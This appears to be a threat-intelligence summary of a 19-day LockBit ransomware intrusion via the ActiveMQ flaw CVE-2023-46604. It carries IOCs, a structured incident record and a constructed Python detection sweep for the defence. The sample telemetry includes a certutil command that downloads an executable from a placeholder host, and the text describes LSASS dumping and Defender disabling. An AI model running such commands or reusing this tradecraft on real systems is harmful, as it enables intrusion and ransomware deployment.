Apache Software Foundation: Threat Actors Exploit Apache ActiveMQ Server Vulnerability to Gain RDP Access and Deploy LockBit Ransomware

Critical Apache ActiveMQ Exploit Leads to LockBit Ransomware Attack in 19-Day Intrusion

A critical remote code execution vulnerability in Apache ActiveMQ (CVE-2023-46604, CVSS 10.0) was exploited by threat actors to deploy LockBit ransomware across an enterprise network, spanning 19 days from initial access to full encryption. The attack began in mid-February 2024, targeting a publicly exposed Windows server running the vulnerable messaging broker.

The intrusion started when attackers sent a malicious OpenWire command to the ActiveMQ server, forcing it to load a remote Java Spring XML configuration file. This triggered the download of a Metasploit stager via Windows CertUtil, establishing a command-and-control (C2) channel to 166.62.100[.]52. Within 40 minutes, the threat actors escalated to SYSTEM-level privileges, dumped credentials from LSASS process memory, and began lateral movement.

Though defenders evicted the attackers on the second day, the unpatched ActiveMQ server remained vulnerable. Eighteen days later, the same threat actors re-entered using the identical exploit, this time leveraging a stolen privileged service account obtained during the first intrusion. Upon return, they confirmed domain administrator access, deployed a disguised network scanner (Advanced IP Scanner masquerading as SoftPerfect Network Scanner), and moved LockBit ransomware executables (LB3.exe, LB3_pass.exe) via RDP sessions.

Ransomware execution varied by target: file and backup servers received specific path and password arguments, while other hosts were infected via double-click execution. Ransom notes directed victims to Session private messaging, suggesting the attackers used the leaked LockBit Black builder rather than official LockBit infrastructure.

The total "Time to Ransomware" was 419 hours (19 days), though the second intrusion could have led to encryption in under 90 minutes if undetected. Attackers also wiped event logs, installed AnyDesk for persistence, and disabled Windows Defender using SystemSettingsAdminFlows.exe on an Exchange server.

Key Indicators of Compromise (IOCs):

  • C2 Server: 166.62.100[.]52
  • Ransomware Executables:
    • LB3.exe (8CEEE89550C521BA43F59D24BA53A22A3B69EAD0FCE118508D0A87A383D6A7B6)
    • LB3_pass.exe (C8646CFB574FF2C6F183C3C3951BF6B2C6CF16FF8A5E949A118BE27F15962FAE)
  • Disguised Tools:
    • netscan.exe (87BFB05057F215659CC801750118900145F8A22FA93AC4C6E1BFD81AA98B0A55)
    • advanced_ip_scanner.exe (722FFF8F38197D1449DF500AE31A95BB34A6DDABA56834B13EAAFF2B0F9F1C8B)
  • AnyDesk Client ID: 1148037084

The attack highlights the risks of unpatched critical vulnerabilities, credential theft via LSASS, and rapid lateral movement in ransomware operations.
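As an added example (not part of the original summary, nor Apache, LockBit-affiliate or Rankiteo code), the following Python sweep turns the behaviours and IOCs described above into simple detection rules run over constructed Sysmon-style events: the broker's Java process spawning CertUtil with a URL, Defender tampering through SystemSettingsAdminFlows.exe, connections to the reported C2 address, and executables whose SHA-256 matches the IOC list. The event schema, file paths and the placeholder URL are assumptions; the IOC values come from the list above.

```python
"""Detection sweep for the ActiveMQ -> LockBit tradecraft described above.

Constructed example. Events follow an assumed, Sysmon-like JSON-lines
schema (kind, image, parent_image, cmdline, sha256, dest_ip); the IOC
values are the ones listed in the summary.
"""
import json
import re

# IOCs from the summary (the defanged 166.62.100[.]52 re-fanged for matching).
C2_IPS = {"166.62.100.52"}
IOC_SHA256 = {
    "8CEEE89550C521BA43F59D24BA53A22A3B69EAD0FCE118508D0A87A383D6A7B6": "LB3.exe",
    "C8646CFB574FF2C6F183C3C3951BF6B2C6CF16FF8A5E949A118BE27F15962FAE": "LB3_pass.exe",
    "87BFB05057F215659CC801750118900145F8A22FA93AC4C6E1BFD81AA98B0A55": "netscan.exe",
    "722FFF8F38197D1449DF500AE31A95BB34A6DDABA56834B13EAAFF2B0F9F1C8B": "advanced_ip_scanner.exe",
}

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def check_event(ev):
    """Return a list of (rule, detail) findings for a single event dict."""
    findings = []
    kind = ev.get("kind")
    image = (ev.get("image") or "").lower()
    parent = (ev.get("parent_image") or "").lower()
    cmdline = ev.get("cmdline") or ""

    if kind == "process":
        # Rule 1: the ActiveMQ Java process launching certutil to fetch a URL
        # (the stager download step in the intrusion described above).
        if image.endswith("certutil.exe") and parent.endswith("java.exe") \
                and URL_RE.search(cmdline):
            findings.append(("certutil_download_from_java", cmdline))
        # Rule 2: Defender being toggled via SystemSettingsAdminFlows.exe.
        if image.endswith("systemsettingsadminflows.exe"):
            findings.append(("defender_tamper_adminflows", cmdline))
        # Rule 3: executable hash present in the IOC list (case-insensitive).
        digest = (ev.get("sha256") or "").upper()
        if digest in IOC_SHA256:
            findings.append(("ioc_hash_match", IOC_SHA256[digest]))
    elif kind == "network":
        # Rule 4: outbound connection to the reported C2 server.
        if ev.get("dest_ip") in C2_IPS:
            findings.append(("c2_connection", ev["dest_ip"]))
    return findings


def sweep(lines):
    """Parse JSON lines and return {event_id: findings} for events that hit."""
    hits = {}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        found = check_event(ev)
        if found:
            hits[ev["id"]] = found
    return hits


# Constructed sample telemetry; not the incident's real logs.
SAMPLE_EVENTS = [
    {"id": 1, "kind": "process", "image": "C:\\Windows\\System32\\certutil.exe",
     "parent_image": "C:\\ActiveMQ\\jre\\bin\\java.exe",
     "cmdline": "certutil -urlcache -f http://placeholder.invalid/x out.exe"},
    {"id": 2, "kind": "process", "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "cmd /c whoami"},
    {"id": 3, "kind": "process", "image": "C:\\Temp\\LB3.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "LB3.exe",
     "sha256": "8ceee89550c521ba43f59d24ba53a22a3b69ead0fce118508d0a87a383d6a7b6"},
    {"id": 4, "kind": "network", "image": "C:\\Temp\\stage.exe",
     "dest_ip": "166.62.100.52", "dest_port": 443},
    {"id": 5, "kind": "process",
     "image": "C:\\Windows\\System32\\SystemSettingsAdminFlows.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "SystemSettingsAdminFlows.exe Defender RtpEnabled 0"},
    {"id": 6, "kind": "network", "image": "C:\\Windows\\System32\\svchost.exe",
     "dest_ip": "10.0.0.5", "dest_port": 445},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for event_id, found in sweep(SAMPLE_LINES).items():
        for rule, detail in found:
            print(f"event {event_id}: {rule} ({detail})")
```

The hash and IP rules are exact-match and go stale as soon as an affiliate rebuilds the payload or changes infrastructure; the two behavioural rules (a JVM spawning CertUtil with a URL, and SystemSettingsAdminFlows.exe launched from a shell) survive such changes and are the ones worth keeping in a production ruleset.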

Source: https://cybersecuritynews.com/threat-actors-exploit-apache-activemq-server-vulnerability/

Apache Software Foundation TPRM report: https://www.rankiteo.com/company/the-apache-software-foundation

"id": "the1772000706",
"linkid": "the-apache-software-foundation",
"type": "Vulnerability",
"date": "2/2024",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'type': 'Enterprise'}],
 'attack_vector': 'Remote Code Execution (RCE)',
 'data_breach': {'data_encryption': True},
 'date_detected': '2024-02-15',
 'description': 'A critical remote code execution vulnerability in Apache '
                'ActiveMQ (CVE-2023-46604, CVSS 10.0) was exploited by threat '
                'actors to deploy LockBit ransomware across an enterprise '
                'network, spanning 19 days from initial access to full '
                'encryption. The attack began in mid-February 2024, targeting '
                'a publicly exposed Windows server running the vulnerable '
                'messaging broker.',
 'impact': {'data_compromised': True,
            'operational_impact': 'Full encryption of systems, wiped event '
                                  'logs, disabled security tools',
            'systems_affected': ['Windows servers',
                                 'ActiveMQ servers',
                                 'File servers',
                                 'Backup servers']},
 'initial_access_broker': {'backdoors_established': ['AnyDesk installation'],
                           'entry_point': 'Publicly exposed Windows server '
                                          'running Apache ActiveMQ',
                           'high_value_targets': ['Domain administrator '
                                                  'access']},
 'lessons_learned': 'Risks of unpatched critical vulnerabilities, credential '
                    'theft via LSASS, and rapid lateral movement in ransomware '
                    'operations.',
 'motivation': 'Financial Gain',
 'post_incident_analysis': {'corrective_actions': ['Patch management for '
                                                   'critical vulnerabilities',
                                                   'Restrict LSASS access',
                                                   'Rotate and monitor '
                                                   'privileged accounts',
                                                   'Implement EDR/XDR '
                                                   'solutions'],
                            'root_causes': ['Unpatched Apache ActiveMQ server '
                                            '(CVE-2023-46604)',
                                            'Credential theft via LSASS '
                                            'dumping',
                                            'Stolen privileged service account '
                                            'reuse']},
 'ransomware': {'data_encryption': True,
                'ransomware_strain': 'LockBit (Black builder variant)'},
 'recommendations': ['Patch critical vulnerabilities immediately',
                     'Monitor and restrict access to LSASS process memory',
                     'Implement network segmentation',
                     'Enhance monitoring for lateral movement',
                     'Disable or restrict RDP where not needed',
                     'Regularly audit privileged service accounts'],
 'references': [{'source': 'Cyber Incident Description'}],
 'response': {'containment_measures': 'Evicted attackers on the second day'},
 'threat_actor': 'LockBit Affiliate',
 'title': 'Critical Apache ActiveMQ Exploit Leads to LockBit Ransomware Attack '
          'in 19-Day Intrusion',
 'type': 'Ransomware',
 'vulnerability_exploited': 'CVE-2023-46604 (Apache ActiveMQ)'}